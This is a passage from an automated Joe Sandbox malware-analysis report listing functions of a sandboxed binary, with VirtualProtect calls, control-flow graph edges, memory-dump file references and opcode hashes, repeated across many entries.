                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 8d6c17fe567b0a46e6eef871445af585baa96369f9b6f305768fb6d38bdc3837
                                                                                                                                                                                                                                                                                                • Instruction ID: 3fd5625bcae63fdf1705e882e060ab3650930da0f141cacb6debeb2bc2d750eb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d6c17fe567b0a46e6eef871445af585baa96369f9b6f305768fb6d38bdc3837
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E99118B2D045289BEB24CA14CCD4AEB77B5EB84311F1491FAD84D62280DA7C6FC2CF95
                                                                                                                                                                                                                                                                                                Function 00438DD7 Relevance: 1.7, APIs: 1, Instructions: 240memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 852 438dd7-438ded 854 438def-438df9 852->854 855 438dfe-438e49 852->855 856 4390a5-4390de call 4390c5 854->856 863 438e4b-438e55 855->863 864 438e5a-43903b call 438f73 855->864 868 439121-43948a call 43913c 856->868 869 4390e0-43911c 856->869 863->856 864->856 884 439490-43951b 868->884 885 43955e-439c43 call 4395e6 call 4398ff call 439918 868->885 875 439c49-439ca6 call 439c6b VirtualProtect 869->875 887 439ca8-439ce6 875->887 888 439cee-439d40 call 439d41 875->888 884->885 910 43951d-439559 call 43954b 884->910 885->875 887->888 910->875
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00000C70,?,?,004398F4,?,?,?,?,?,00000000,?,0043962C), ref: 00439C9E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 4685a9bd32438aa35cf74ccdfbac0aab84972b5c8e00f71b64a9273c2ef0a195
                                                                                                                                                                                                                                                                                                • Instruction ID: a4a4f988380392004f738fe2286c6b575df809d38f264b81318ed9f9701a64e0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4685a9bd32438aa35cf74ccdfbac0aab84972b5c8e00f71b64a9273c2ef0a195
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D58115B2D046289BF7248B14DC84AEBB774FF84310F1151BAE84D67280E67D5FC68E96
                                                                                                                                                                                                                                                                                                Function 0043906D Relevance: 1.7, APIs: 1, Instructions: 220memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00000C70,?,?,004398F4,?,?,?,?,?,00000000,?,0043962C), ref: 00439C9E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b97a245955e9697e30ce8775037ed49f309bdd760a86aa50fceda0ea5d53973b
                                                                                                                                                                                                                                                                                                • Instruction ID: 68eec6d4c48b026fb447748f2eac236c10be9a9eb6ecbdd51dbcb32dabf73732
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b97a245955e9697e30ce8775037ed49f309bdd760a86aa50fceda0ea5d53973b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB7126B2D006299BF7248B14DC84AEBB775FF84310F1051BAE84DA7640E67D1FC28E96
                                                                                                                                                                                                                                                                                                Function 00438E6D Relevance: 1.7, APIs: 1, Instructions: 207COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6c1fda05b6bffb3d7f1498c3e952808733eab8863780d431a016247af6c71828
                                                                                                                                                                                                                                                                                                • Instruction ID: abd29a1015d559b113e014c9428e8be53776c6b5e353e8f7dd93c93bb594a027
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c1fda05b6bffb3d7f1498c3e952808733eab8863780d431a016247af6c71828
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD6149B2D006299BF7248B54DC84AEBB774FF94310F1541BAE84DA7640E67D1FC28E92
                                                                                                                                                                                                                                                                                                Function 00438FAD Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 2002c727d5308a0fd1781aead3027e254008a77d52e67f2fbfe9270f5d6b0595
                                                                                                                                                                                                                                                                                                • Instruction ID: f8146c05fe8c4734bdf3a43265f584f47094c3d125935100d234c13a24ec2489
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2002c727d5308a0fd1781aead3027e254008a77d52e67f2fbfe9270f5d6b0595
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 776105B2D006299AF7248B55DC44AEBB774FF94311F1041BAE84D67280E67D1EC28E92
                                                                                                                                                                                                                                                                                                Function 00439856 Relevance: 1.7, APIs: 1, Instructions: 192memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00000C70,?,?,004398F4,?,?,?,?,?,00000000,?,0043962C), ref: 00439C9E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 22d554c5dea25d84e1b9832b73cb91cd2bf611b0c7a40566954d2823d04cda73
                                                                                                                                                                                                                                                                                                • Instruction ID: 2ce15c870844172f06cdac1138b78d88d52bcb9eec1845cb16620768a15bead4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22d554c5dea25d84e1b9832b73cb91cd2bf611b0c7a40566954d2823d04cda73
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F71D0B2D056289BE7208B10CC81AEAB779FF84300F1551FAD84D67241D6785EC6CF46
                                                                                                                                                                                                                                                                                                Function 00439A16 Relevance: 1.7, APIs: 1, Instructions: 155memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00000C70,?,?,004398F4,?,?,?,?,?,00000000,?,0043962C), ref: 00439C9E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a70d30e3f3b75511c952734a9120023184fcacd2ed169db5a50dd3ce25d55133
                                                                                                                                                                                                                                                                                                • Instruction ID: 4b72825226c6584f60de9c45d427f05070365422e34b6a52c30d0db9cea1611d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a70d30e3f3b75511c952734a9120023184fcacd2ed169db5a50dd3ce25d55133
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A510FB1E052199FEB24CB14CC90AEAB7B5EF88300F1491EAD94D67241C6796FC2CF51
                                                                                                                                                                                                                                                                                                Function 0043941A Relevance: 1.6, APIs: 1, Instructions: 148memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00000C70,?,?,004398F4,?,?,?,?,?,00000000,?,0043962C), ref: 00439C9E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3a359ee2a3b03e90d081b30936bbb9807928d439a71d6ea281ba6fb85533bc12
                                                                                                                                                                                                                                                                                                • Instruction ID: 754dadfcd19874b5023fa138790869bafb464d15de48b8353ee1bab91003d90e
